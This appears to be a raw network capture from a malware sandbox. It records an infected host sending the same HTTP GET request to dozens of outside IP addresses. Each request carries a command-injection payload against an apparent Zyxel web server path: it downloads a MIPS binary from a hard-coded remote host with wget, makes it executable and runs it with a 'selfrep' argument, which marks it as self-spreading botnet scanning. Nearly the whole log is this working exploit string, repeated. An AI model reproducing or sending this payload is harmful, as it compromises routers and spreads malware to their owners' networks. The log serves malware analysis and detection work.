                                                        Jan 28, 2024 10:12:45.266426086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2573192.168.2.144825283.77.238.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266443968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2574192.168.2.144597276.2.68.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266493082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2575192.168.2.1452762187.54.181.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266525984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2576192.168.2.1436850128.26.172.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266546965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2577192.168.2.143754464.143.76.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266591072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2578192.168.2.1448722141.229.95.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266649008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2579192.168.2.1450568185.49.112.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266669989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2580192.168.2.1442432162.183.25.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266699076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2581192.168.2.1452262195.97.68.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266741037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2582192.168.2.1444034203.184.91.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266767025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2583192.168.2.1452752149.119.254.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266829967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2584192.168.2.1460202160.76.12.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266877890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2585192.168.2.1450072216.34.244.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266908884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2586192.168.2.145489670.73.15.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266937971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2587192.168.2.1440762204.149.214.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266979933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2588192.168.2.143571068.169.207.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267029047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2589192.168.2.143493652.69.182.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267065048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2590192.168.2.143961671.102.28.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267082930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2591192.168.2.1452534150.42.240.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267122984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2592192.168.2.1449076187.192.131.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267163038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2593192.168.2.143996090.69.26.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267201900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2594192.168.2.1436554192.41.138.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267240047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2595192.168.2.144349837.77.145.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267280102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2596192.168.2.1434638139.97.154.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267309904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2597192.168.2.1453228131.227.33.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267359018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2598192.168.2.1436964173.82.223.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267364979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2599192.168.2.1438688185.44.184.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267417908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2600192.168.2.145863434.187.29.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267452002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2601192.168.2.1435770162.235.234.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267494917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2602192.168.2.1436112131.242.20.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267535925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2603192.168.2.144362225.91.24.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267574072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2604192.168.2.1453520188.24.169.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267612934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2605192.168.2.1446780172.167.92.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267663956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2606192.168.2.1434106189.86.85.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267693043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2607192.168.2.144701445.160.110.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267755032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2608192.168.2.1455874212.123.44.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267788887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2609192.168.2.1433744126.77.179.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267817020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2610192.168.2.146092454.154.248.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267864943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2611192.168.2.1451496101.7.38.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267908096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2612192.168.2.145333819.112.63.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267940044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2613192.168.2.1441776186.157.67.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.267997026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2614192.168.2.1448180118.224.16.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268032074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2615192.168.2.14552648.211.181.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268068075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2616192.168.2.1447376120.221.200.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268095970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2617192.168.2.1445750189.98.165.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268151999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2618192.168.2.1442490148.158.115.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268202066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2619192.168.2.145032636.12.56.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268239021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2620192.168.2.143361425.176.177.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268258095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2621192.168.2.1433574145.35.77.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268292904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2622192.168.2.145821865.222.10.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268343925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2623192.168.2.1458818221.251.61.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268366098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2624192.168.2.145252444.8.230.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268413067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2625192.168.2.146060614.1.106.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268455029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2626192.168.2.1460840159.154.26.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268491030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2627192.168.2.14586888.225.82.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268512011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2628192.168.2.1452812106.247.190.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268584013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2629192.168.2.1438724199.3.63.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268591881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2630192.168.2.14334662.70.43.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268631935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2631192.168.2.144899091.148.36.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268675089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2632192.168.2.1449516118.168.33.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268707991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2633192.168.2.145114684.255.129.80443
                                                        TimestampBytes transferredDirectionData
